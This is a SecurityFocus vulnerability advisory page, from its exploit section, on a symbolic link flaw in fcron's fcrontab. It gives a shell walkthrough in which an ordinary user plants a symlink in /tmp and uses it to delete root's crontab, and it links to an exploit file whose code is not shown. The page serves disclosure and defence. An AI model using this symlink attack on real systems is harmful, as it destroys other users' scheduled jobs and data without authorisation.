Thibault Godouet Fcron Symbolic Link Vulnerability
   
   [1]_/info\_ [2]_/discussion\_ [3]_/exploit\_ [4]_/solution\_
   [5]_/credit\_ [6]_/help\_ 
   How to repeat:
   1. Install a crontab, for example for the root user:
   root# ls -l /var/spool/fcron/
   total 0
   root# echo '0 0 * * * echo test' | fcrontab -
   09:53:00 installing file /tmp/fcrontab.27301 for user root
   Modifications will be taken into account right now.
   root# ls -l /var/spool/fcron/
   total 2
   -rw------- 1 root root 110 May 7 09:53 root
   -rw------- 1 root fcron 20 May 7 09:53 root.orig
   2. As a normal user write and execute a script:
   uwe$ cat ~/x
   #! /bin/sh
   ln -s /var/spool/fcron/rm.root /tmp/fcrontab.$$
   exec fcrontab - <<EOF
   * * * * * false
   EOF
   uwe$ ./x
   09:55:55 installing file /tmp/fcrontab.27536 for user uwe
   09:55:55 User uwe can't read file "/tmp/fcrontab.27536": Permission
   denied
   3. As root look into the fcron spool directory:
   root# ls -l /var/spool/fcron/
   total 3
   -rw-r----- 1 uwe fcron 16 May 7 09:55 rm.root
   -rw------- 1 root root 110 May 7 09:53 root
   -rw------- 1 root fcron 20 May 7 09:53 root.orig
   4. As the normal user edit your crontab:
   uwe$ echo '* * * * * true' | fcrontab -
   09:59:15 installing file /tmp/fcrontab.27543 for user uwe
   Modifications will be taken into account at 10h00.
   5. As root wait up to a minute and look into the fcron spool
   directory:
   # ls -l /var/spool/fcron/
   total 3
   -rw------- 1 root fcron 20 May 7 09:53 root.orig
   -rw------- 1 root root 102 May 7 09:59 uwe
   -rw-r----- 1 fcron fcron 15 May 7 09:59 uwe.orig
   6. Root's crontab is gone, look into your backups.
   Exploit (fcronx.c) by _kiss_
   
     [7]/data/vulnerabilities/exploits/fcronx.c
   
                < [8]http://www.securityfocus.com/bid/2835 >
   For additions or corrections please email [9]vuldb@securityfocus.com.
           [10]Disclaimer | [11]About The Vulnerability Database
                                      
                           [12]Privacy Statement
                [13]Copyright © 1999-2001 SecurityFocus.com

References

   1. http://www.securityfocus.com/vdb/bottom.html?vid=2835
   2. http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=2835
   3. http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=2835
   4. http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=2835
   5. http://www.securityfocus.com/vdb/bottom.html?section=credit&vid=2835
   6. http://www.securityfocus.com/vdb/bottom.html?section=help&vid=2835
   7. http://www.securityfocus.com/data/vulnerabilities/exploits/fcronx.c
   8. http://www.securityfocus.com/bid/2835
   9. mailto:vuldb@securityfocus.com
  10. http://www.securityfocus.com/legalize/vdb_disclaimer.html
  11. http://www.securityfocus.com/about/vuldb.html
  12. http://www.securityfocus.com/account/privacy.html
  13. http://www.securityfocus.com/legalize/copyright.html